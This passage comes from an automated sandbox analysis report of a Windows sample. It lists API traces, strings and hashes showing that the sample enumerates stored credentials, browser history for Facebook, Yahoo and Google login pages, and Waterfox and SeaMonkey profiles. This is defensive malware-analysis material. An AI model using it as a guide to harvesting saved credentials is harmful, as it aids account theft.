                                                                                                                                                                                                                                    control_flow_graph 721 40e175-40e1a1 call 40695d call 406b90 726 40e1a7-40e1e5 memset 721->726 727 40e299-40e2a8 call 4069a3 721->727 729 40e1e8-40e1f3 call 406e8f 726->729 732 40e1f8-40e1fa 729->732 733 40e270-40e27d call 406b53 732->733 734 40e1fc-40e219 call 40dd50 * 2 732->734 733->729 739 40e283-40e286 733->739 734->733 745 40e21b-40e21d 734->745 742 40e291-40e294 call 40aa04 739->742 743 40e288-40e290 free 739->743 742->727 743->742 745->733 746 40e21f-40e235 call 40742e 745->746 746->733 749 40e237-40e242 call 40aae3 746->749 749->733 752 40e244-40e26b _snwprintf call 40a8d0 749->752 752->733
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040E1BD
                                                                                                                                                                                                                                      • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                                                                                                                                    • free.MSVCRT ref: 0040E28B
                                                                                                                                                                                                                                      • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                                                                                                                                      • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                                                                                                                                                                                      • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                                                                                                                                                                                    • _snwprintf.MSVCRT ref: 0040E257
                                                                                                                                                                                                                                      • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                                                                      • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                                                                                                                                      • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                                                                                                                                      • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                                                                                                                                                                                    • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                                                                                                                                                                                    • API String ID: 2804212203-2982631422
                                                                                                                                                                                                                                    • Opcode ID: 7a95fccbd23525aa76b2e079fc64e0475dfff11d865135f876cd6a5397388c2b
                                                                                                                                                                                                                                    • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7a95fccbd23525aa76b2e079fc64e0475dfff11d865135f876cd6a5397388c2b
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                                                                                                      • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                                                                                                                                      • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040BC75
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040BC8C
                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,Function_0004E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                                                                                                                                                                                                    • memcmp.MSVCRT(?,00000000,00000005,?,?,?,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE), ref: 0040BCD6
                                                                                                                                                                                                                                    • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 115830560-3916222277
                                                                                                                                                                                                                                    • Opcode ID: 4ebf604db45489440b0c8485e844b7deffc41ff7e568ae10611abfa3d316197e
                                                                                                                                                                                                                                    • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4ebf604db45489440b0c8485e844b7deffc41ff7e568ae10611abfa3d316197e
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 822 41837f-4183bf 823 4183c1-4183cc call 418197 822->823 824 4183dc-4183ec call 418160 822->824 829 4183d2-4183d8 823->829 830 418517-41851d 823->830 831 4183f6-41840b 824->831 832 4183ee-4183f1 824->832 829->824 833 418417-418423 831->833 834 41840d-418415 831->834 832->830 835 418427-418442 call 41739b 833->835 834->835 838 418444-41845d CreateFileW 835->838 839 41845f-418475 CreateFileA 835->839 840 418477-41847c 838->840 839->840 841 4184c2-4184c7 840->841 842 41847e-418495 GetLastError free 840->842 845 4184d5-418501 memset call 418758 841->845 846 4184c9-4184d3 841->846 843 4184b5-4184c0 call 444706 842->843 844 418497-4184b3 call 41837f 842->844 843->830 844->830 850 418506-418515 free 845->850 846->845 850->830
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                                                                                                                                                                                    • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0041847E
                                                                                                                                                                                                                                    • free.MSVCRT ref: 0041848B
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CreateFile$ErrorLastfree
                                                                                                                                                                                                                                    • String ID: |A
                                                                                                                                                                                                                                    • API String ID: 77810686-1717621600
                                                                                                                                                                                                                                    • Opcode ID: b9220c8ee9235e77546fc7e578fe859ac5c7910c95b4d012992e052ab282d142
                                                                                                                                                                                                                                    • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b9220c8ee9235e77546fc7e578fe859ac5c7910c95b4d012992e052ab282d142
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0041249C
                                                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00002A88), ref: 004124D2
                                                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000350), ref: 00412510
                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,0000000E), ref: 00412582
                                                                                                                                                                                                                                    • LoadIconW.USER32(00000000,00000065), ref: 0041258B
                                                                                                                                                                                                                                    • wcscpy.MSVCRT ref: 004125A0
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                                                                                                                                                                                    • String ID: r!A
                                                                                                                                                                                                                                    • API String ID: 2791114272-628097481
                                                                                                                                                                                                                                    • Opcode ID: c924fcd7ecfcbdf661535418ab9e4f477d4ea067639620652b406838daccced0
                                                                                                                                                                                                                                    • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c924fcd7ecfcbdf661535418ab9e4f477d4ea067639620652b406838daccced0
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                                                                                                                                                      • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                                                                                                                                                      • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                                                                                                                                                      • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                                                                                                                                                                                      • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                                                                                                                                      • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                                                                                                                                                                                      • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                                                                                                                                                                                      • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                                                                                                                                      • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                                                                                                                                                                                      • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                                                                                                                                                                                      • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                                                                                                                                      • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                                                                                                                                                                                      • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                                                                                                                                                                                      • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                                                                                                                                    • _wcslwr.MSVCRT ref: 0040C817
                                                                                                                                                                                                                                      • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                                                                                                                                                                                      • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                                                                                                                                                                                    • wcslen.MSVCRT ref: 0040C82C
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                                                                                                                                                                                    • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                                                                                                                                                                                    • API String ID: 2936932814-4196376884
                                                                                                                                                                                                                                    • Opcode ID: b881829d82f0d8b9654aa99a04529af2f3c2152f6b010e5444e3d03ead400705
                                                                                                                                                                                                                                    • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b881829d82f0d8b9654aa99a04529af2f3c2152f6b010e5444e3d03ead400705
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                                    • GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                                    • wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                                    • LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                                                                                                    • String ID: C:\Windows\system32
                                                                                                                                                                                                                                    • API String ID: 669240632-2896066436
                                                                                                                                                                                                                                    • Opcode ID: 808217d469f29374b6c53add07773bde8ba425e7a3f83fd710eb9a2b8acfca27
                                                                                                                                                                                                                                    • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 808217d469f29374b6c53add07773bde8ba425e7a3f83fd710eb9a2b8acfca27
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                                                                                                                                                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                                                                                                                                                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                                                                                                                                                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                                                                                                                                                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                                                                                                                                                    • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                                                                                                                                                    • wcslen.MSVCRT ref: 0040BE06
                                                                                                                                                                                                                                    • wcsncmp.MSVCRT ref: 0040BE38
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040BE91
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                                                                                                                                                    • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                                                                                                                                                                                                    • wcschr.MSVCRT ref: 0040BF24
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AddressProc$CredEnumerateFreeLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 697348961-0
                                                                                                                                                                                                                                    • Opcode ID: 33cbc3fbfef4114ffc04ab79ab4e472c1ca1484598d0cfc67a802b423a316e07
                                                                                                                                                                                                                                    • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 33cbc3fbfef4114ffc04ab79ab4e472c1ca1484598d0cfc67a802b423a316e07
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00403CBF
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00403CD4
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00403CE9
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00403CFE
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00403D13
                                                                                                                                                                                                                                      • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                                                                      • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                                                      • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                                                                      • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                                                                                      • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00403DDA
                                                                                                                                                                                                                                      • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                                                                      • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                                                                                                                                                    • String ID: Waterfox$Waterfox\Profiles
                                                                                                                                                                                                                                    • API String ID: 4039892925-11920434
                                                                                                                                                                                                                                    • Opcode ID: 74213e66932f07ea3ad059af1798c87c438cc92db4e0e7cdb609a7dadd567ada
                                                                                                                                                                                                                                    • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 74213e66932f07ea3ad059af1798c87c438cc92db4e0e7cdb609a7dadd567ada
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00403E50
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00403E65
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00403E7A
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00403E8F
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00403EA4
                                                                                                                                                                                                                                      • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                                                                      • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                                                      • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                                                                      • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                                                                                      • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00403F6B
                                                                                                                                                                                                                                      • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                                                                      • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                                                                                                                                                    • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                                                                                                                                                                                    • API String ID: 4039892925-2068335096
                                                                                                                                                                                                                                    • Opcode ID: fb8d06a7ed3fa35f71d99b938417e45633d605fe1ac21657eef3450a4ac41d2d
                                                                                                                                                                                                                                    • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fb8d06a7ed3fa35f71d99b938417e45633d605fe1ac21657eef3450a4ac41d2d
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00403FE1
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00403FF6
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040400B
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00404020
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00404035
                                                                                                                                                                                                                                      • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                                                                      • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                                                      • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                                                                      • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                                                                                      • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 004040FC
                                                                                                                                                                                                                                      • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                                                                      • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
